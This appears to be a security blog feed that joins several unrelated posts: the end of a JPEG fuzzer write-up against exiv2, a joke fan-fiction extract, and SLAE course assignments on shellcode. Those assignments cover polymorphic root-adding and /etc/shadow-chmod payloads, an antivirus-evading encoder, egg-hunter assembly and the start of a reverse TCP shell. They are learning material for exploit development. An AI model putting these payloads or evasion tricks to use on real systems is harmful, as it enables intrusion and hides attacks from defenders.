	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milleseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So we’re roughly 33% faster with our C++ implementation. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us explore but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported, and not a trivial binary for us to find bugs on like our last target (an unsupported 7 year old project on Github).

This target has already been fuzzed by much more advanced fuzzers, you can simply google for something like ‘ASan exiv2’ and get plenty of hits of fuzzers creating segfaults in the binary and forwarding the ASan output to the github repository as a bug. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor it’s performance over 50,000 iterations. Let’s add some code that monitors for Floating point exceptions in addition to our Segmentation fault detection (Call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    elif p.returncode == -8:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs, that’s a shame, but could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similiar time but much improved:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C and I made some modest improvements on my own. One of the logic changes I made was to collect the data from the original valid image only once and then copy that data into a newly allocated buffer each fuzzing iteration and then do the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds. This was pretty typical in my testing. So just by the few logic changes and using less C++-provided abstractions we saved a lot of sys time. We increased speed by about 5%.

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    char* argv[4];
    argv[0] = "pr";
    argv[1] = "-v";
    argv[2] = "mutated.jpeg";
    argv[3] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

Taking a joke a little too far.

By: tiraniddo
1 April 2020 at 11:00

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

heappo: a WinDBG extension for heap tracing

24 March 2020 at 00:00
Preface During these days of forced quarantine time-off, I have been reviewing notes and exercises from the outstanding Corelan Advanced training I took last October at Brucon, and so I decided to work on some tooling I had in mind lately. The idea came from thisresearch by Sam Brown from F-Secure: after testing the tool I decided to port it to the latest PyKD version to support both Python3 and Python2, and can run on both x86 and x64 (tested on latest Win10 1909) I aptly named this effort Heappo and here some of its key-features and enhancements.

Shellcode Polymorphism

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
GitHub:

SLAE Assignment #6 - Polymorphic
     - Create a polymorphic version of 3 shellcodes from Shell-Storm
     - The polymorphic versions cannot be larger than 150% of the existing shellcode
     - Bonus: points for making it shorter in length than original



~~~~~~~~~//*****//~~~~~~~~~


0x1 - add root user (r00t) with no password to /etc/passwd
link: www.shell-storm.org/shellcode/files/shellcode-211.php

Original shellcode, assembled using ndisasm



For this, we can focus on lines 6, B, 15 and 25, 2A, 2F. The following instructions correspond to the two syscalls: open() and write (). The open() opens /etc//passwd and write() writes r00t::0:0::: I was able to change the values by running add and sub operations. I could have changed r00t::0:0::: as well using XOR operations or getting rid of the push (replaced with mov)  instructions, however, I would have exceeded the 150% of shellcode size limit.





0x2 - chmod (etc/shadow, 0777)
link: www.shell-storm.org/shellcode/files/shellcode-593.php

Here's the original shellcode with the size of 29 bytes disassembled using ndisasm. Similar to 0x1, lines 3, 8, and D show the file name /etc//shadow which means this will be the focus with the polymorphism process. Line 14 shows the permission 0777 which could also be polymorphed using some add or sub instructions but I didn't do it base on the %150 shellcode size requirement.



For the polymorphism, I used a combination of similar technique from 0x1 plus a JMP-CALL-POP technique. I subtracted 0x11111111 from each dword and then dynamically loaded the new values to the stack. After they are popped, I added 0x11111111 to recover the original value before they pushed back into the stack again. The size of the new shellcode is 44 bytes.


0x3 -iptables -F
link: www.shell-storm.org/shellcode/files/shellcode-368.php


The following instructions results: /sbin/iptables -F which then get executed using execve()




I used the JMP-CALL-POP method to change it up. Basically the /sbin/iptables -F hex codes from above are replaced. The new shellcode size is 58 bytes.


Thank you for reading.

Shellcode Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #5 - Analysis of Linux/x86 msfpayload shellcodes

          - Use GDB/ndisasm/libemu to dissect the functionality of the shellcode


~~~~~~~~~//*****//~~~~~~~~~


For this assignment, I will be using the first three Linux/x86 payloads generated by msfvenom (formerly msfpayload)


0x1 - linux/x86/adduser


A quick ndisasm gives us the following:

msfvenom -p linux/x86/adduser -f raw | ndisasm-u -



The first obvious ones are the 4-dwords:

           push dword 0x64777373
           push dword 0x61702f2f
           push dword 0x6374652f

The following dwords (in little-endian) are the hex representation of /etc//passwd as shown below:


However, it is still unclear as to what is being done to the /etc//passwd file. I think this is where we can use gdb to see what system calls are being invoked.

I generated the shellcode from msfvenom, loaded it in shellcode.c, compiled and loaded in gdb.




Once loaded in gdb...we first set a breakpoint for shellcode: break *&code 



We can see again the /etc//passwd in lines +15, +20, +25. We can also see several int 0x80 (lines +7, +35, +86, +91) for the system calls. We can add breakpoints on these lines to see what system calls are loaded into eax. 


Note: Here is a list of all the system calls with their corresponding call numbers found in /usr/include/i86-linux-gnu/asm/unistd_32.h


Syscall #1:  eax has 46 or setgid() loaded to it.



setgid() call is pretty straight forward. This call sets a user's group id. In this case, the group id is set to 0 as seen in the first two lines. The function calls only require one argument, in this case 0 is loaded into ebx (mov ebx, ecx) as the argument. 

                                                  root@kali:~/SLAE# id
uid=0(root) gid=0(root) groups=0(root)



                   
Syscall #2: eax has 5 or open() loaded to it.


open() here opens /etc/passwd file for the pathname and sets the flags to O_RDWR (Read/Write). This step will require root access hence why setgid()  was called first and set the user's group id to 0.

                      
                             push   0x64777373
                             push   0x61702f2f
                             push   0x6374652f




Syscall #3: eax has 4 or write() loaded to it.


write() has 3 arguments (fd, *buf, count). count writes up to count bytes from the buffer pointed buf to the file referred to by the file descriptor fd.



The following is what gets written in to /etc/passwd file.
USER=test
PASS=password (in this case it is hashed)
SHELL=/bin/bash



syscall #4: eax has 1 or exit() loaded to it....enough said.




0x2 - linux/x86/chmod

We again generate a shellcode with the following options:

FILE=/home/slae/test.txt
MODE=0777





Compile and we load the file in gdb.


We put a breakpoint at the system  call @ +37 (0x804a065)

Syscall: eax has 15 or chmod() loaded to it.



chmod() requires two arguments: pathname and mode

pathname: /home/slae/test.txt (ebx)



mode: 0777 (ecx) 

Here we can see 0x1ff (0777) pushed to the stack and popped into ecx


0x3 - linux/x86/exec

We generate a shellcode with the following option:

CMD=ifconfig



Compile and load it in gdb


We put a breakpoint at the system call @ +42 (0x0804a06a)

syscall: eax has 11 or execve() loaded to it.



Here we see the first part of the string for the command /bin/sh -c loaded into ebx.





The next string should be ifconfig, however, I couldn't find it using gdb. I ended up using ndisasm for this next step.

 
Call dword 0x26 is what we are looking for. Looking at 1D to 24, we can see that these are the opcodes for ifconfig. 


Furthermore, plugging the next opcodes (26 through 29) shows how the entire command string (/bin/sh -c ifconfig) is pushed into the stack (esp), and loaded into ecx




Thank you for reading.

Shellcode Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #4 - Encoder
 - Create a custom encoding scheme


~~~~~~~~~//*****//~~~~~~~~~



For this assignment,  we will be encoding an execve shellcode that spawns a /bins/sh using XOR and then NOT encoding The idea behind encoding is that we can alter opcodes without altering its functionality. For instance, using the shellcode below, it is pretty clear that our shellcode contains \x2f\x2f\x73\x68\x2f\x62\x69\x6e which translates to //bin/sh. Among other things, this is something that could be easily caught by Anti-virus (AV) or Intrusion  Detection System (IDS).

Below is the original execve-stack.nasm file and its corresponding opcodes/shellcode.






Once we get the original shellcode...I used python for encoding which will be a two-step process: XOR encoding first, then NOT encoding the result of the first step.

Here we initialize it with our original shellcode from execve-stack.nasm file:


The first step is the  XOR encoding. For this step, I am going through each byte of the original shellcode and XOR'ng it with 0xaa.


The second step is to encode each byte of the result from XOR encoding, with a NOT encoding.




Below is the output of the encoder python script. I am printing both XOR and NOT encoded shellcodes however, we will only need the NOT encoded shellcode for our decoder.



With the 'XOR then NOT' encoded shellcode, we are now ready to create our decoder to revert or decode it back to the original shellcode.

For this step, I am using the jmp-pop-call method again. We load the encoded shellcode into the stack by using the call instruction. We then pop it and load it into a register (esi for this one). We can then loop through each byte of the encoded shellcode loaded in esi. 

We first do a NOT then followed by XOR 0xaa.

Below shows the encoding and decoding scheme for the first byte

encoding: 0x31---> 0x9b (0x31 XOR 0xaa) -----> 0x64 (NOT 0x9b & 0xff)
decoding: 0x64---> 09xb (NOT 0x64 & 0xff) ---> 0x31 (0x9b XOR 0xaa)

...and here's the complete nasm file with our decoder.



We compile then generate a new shellcode using objdump.


We update our shellcode.c file, compile it and execute.

Note that with this the new shellcode, it shows that we can 'hide' the //bin/sh while maintaining the functionality.


SUCCESS!


Egg Hunter

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #3 - Egghunter
        

          - Create a working demo of the egg hunter

~~~~~~~~~//*****//~~~~~~~~~


For the 3rd assignment, I will be creating an 'egg hunter' shellcode. This wasn't covered in the SLAE course. As mentioned by a lot of SLAE blogs, a good source is from skape research paper. My shellcode did not deviate too much from what skape has shown. I created some labels to make it more readable and easier to follow the flow of instructions.

What is an egg_hunter? Why do we need it?

An egg hunter is a shellcode that points to another shellcode. It is basically a staged shellcode where the egg hunter shellcode is stage one while the actual shellcode that spawns the shell (reverse, bind, meterpreter, etc) is stage two. It is needed during an exploit development (i.e. buffer overflow) where the application only allows a small space for a shellcode--too small for the stage two shellcode, however it has enough address space for stage one.

This is accomplished by using an 'egg(s)' which is a unique 8-byte opcode (or hex). The egg gets loaded into both the stage 1 and stage 2 shellcodes. When stage one shellcode executes, it searches for the unique 8-byte egg and transfers execution control (stage 2).

Here I globally defined egg with the following and then initialized eax, ebx, ecx, edx registers:

       %define _EGG                    0x50905090

       xor ebx, ebx                         ;remove x00/NULL byte
       mov ebx  _EGG                   ;move 0x50905090 egg into ebx register
       xor ecx, ecx                         ;remove x00/NULL byte  
       mul ecx                                ;intializes eax, ecx, edx with x000000000 value


We are now ready to do some system calls. According to skape, two system calls can be used: access() and sigaction(). For this write-up, I will only be using access().


We will be using the *pathname pointer argument to validate the address that will contain our egg.

 I globally defined two more variables: the access() syscall and EFAULT

      %define _SYSCALL_ERR       ;0xf2
      %define __NR_access              ;0x21

...and created two labels: NEXT_PAGEFILE and NEXT_ADDRESS

The first label is used to switch to the next page if an invalid address memory is returned with the syscall...each pagefile/PAGESIZE contains 4096 bytes. This is accomplished using an OR instruction

NEXT_PAGEFILE:

      or dx, 0xfff                                 ;note that edx is the pointed *pathname
                                                         ;0xffff == 4095

The second label will be our meat and potatoes. Within this label or procedure, we will be calling the access(2) syscall, compare the results (egg hunting), and loop through the address space.

NEXT_ADDRESS:

        inc edx                               ;increments edx, checks next address if it contains the egg
        pusha                                 ;push eax, ebx, ecx, edx....these registers are used multiple 
                                                   ;pushing them to the stack to preserve values when popped
        lea ebx, [edx +4]
        xor eax, eax                      ;remove x00/NULL byte
        mov al, __NR_access       ;syscall 33 for access(2)
        int 0x80                            ;interrupt/execute

        ;egg hunting begins

        cmp al, SYSCALL_ERR ;compares return value of al to 0xf2 (EFAULT)
        popa                                 ;branch, pop eax, ebx, ecx, edx
        jz NEXT_PAGEFILE     ;al return value == EFAULT value, invalid address memory
                                                 ;move to the next PAGESIZE

        cmp [edx], ebx                 ;if al retun value != EFAULT value, execute this instruction
                                                 ;compares the egg with edx value
        jnz NEXT_ADDRESS    ;not EFAULT but _EGG not found, loop again


        cmp[edx +4], ebx             ;_EGG found, test for the next 4 byte of the _EGG
       jnz NEXT_ADDRESS     ;if next 4 bytes of edx value !=_EGG, loop again

       jmp edx                             ;finally, 8 bytes of _EGG found, jmp to address of edx     

We compile our nasm file and obtain our shellcode using objdump.


We now have our stage one shellcode and for the stage two shellcode, I will be using the reverse TCP shellcode from SLAE Assignment #2.

I updated the shellcode.c file to include both stage one and stage two shellcodes as seen below.



For testing, I am using my kali box again to receive the reverse TCP shell. We compile our shellcode.c, open a listener in Kali and run the exploit.



SUCCESS!!



Reverse TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #2 - Create a Shell_Reverse_TCP shellcode
      

      - Reverse connects to configured IP and Port
      - Execs shell on successful connection
      - IP and Port should be easily configurable

~~~~~~~~~~//*****//~~~~~~~~~~


Creating a REVERSE_TCP shell consist of 3 functions

0x1 socket
0x2 connect
0x3 execve



0x1 - socket

Similar to assignment #1, the first thing we need to do is set-up our socket. This can be accomplished by pushing the following parameters into the stack.

We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

                push 0x6                ;TCP or 0x6
               push 0x1               ;SOCK_STREAM or 0x1
              push 0x2               ;AF_INET or 0x2

We can then invoke the socketcall() system call, as shown below:

               xor eax, eax            ;remove x00/NULL byte
               mov al, 0x66            ;syscall 102 for socketcall
               xor ebx, ebx            ;remove x00/NULL byte
